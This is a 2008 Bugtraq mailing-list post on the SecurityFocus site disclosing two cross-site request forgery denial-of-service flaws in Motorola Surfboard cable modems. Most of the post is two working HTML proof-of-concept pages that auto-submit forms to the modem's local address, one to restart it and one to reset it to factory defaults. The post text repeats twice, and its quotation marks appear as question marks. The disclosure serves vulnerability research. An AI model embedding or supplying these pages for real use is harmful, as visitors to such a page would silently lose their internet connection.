Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Sea-Surfing on the Motorola Surfboard
Apr 18 2008 07:13AM
th3 r00k nospam pork gmail com
More information about this flaw can be found here:
http://www.rooksecurity.com/blog/?p=4
Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery.
The latest version of The Motorola Surfboard is affected at the time of the writing.
Restarts the modem:
<html>
<form id=1 method=post action=?http://192.168.100.1/configdata.html?>
<input name=?BUTTON_INPUT? value=?Restart+Cable+Modem?>
</form>
<html>
<script>
document.getElementById(1).submit();
</script>
This CSRF will disconnect the user from the internet for longer.
?The process to get back online from a factory default condition could take from 5 to 30 minutes.?
<html>
<form id=2 method=post action=?http://192.168.100.1/configdata.html?>
<input name=?BUTTON_INPUT? value=?Reset+All+Defaults?>
</form>
<html>
<script>
document.getElementById(2).submit();
</script>
Peace
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
http://www.rooksecurity.com/blog/?p=4
Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery.
The latest version of The Motorola Surfboard is affected at the time of the writing.
Restarts the modem:
<html>
<form id=1 method=post action=?http://192.168.100.1/configdata.html?>
<input name=?BUTTON_INPUT? value=?Restart+Cable+Modem?>
</form>
<html>
<script>
document.getElementById(1).submit();
</script>
This CSRF will disconnect the user from the internet for longer.
?The process to get back online from a factory default condition could take from 5 to 30 minutes.?
<html>
<form id=2 method=post action=?http://192.168.100.1/configdata.html?>
<input name=?BUTTON_INPUT? value=?Reset+All+Defaults?>
</form>
<html>
<script>
document.getElementById(2).submit();
</script>
Peace
[ reply ]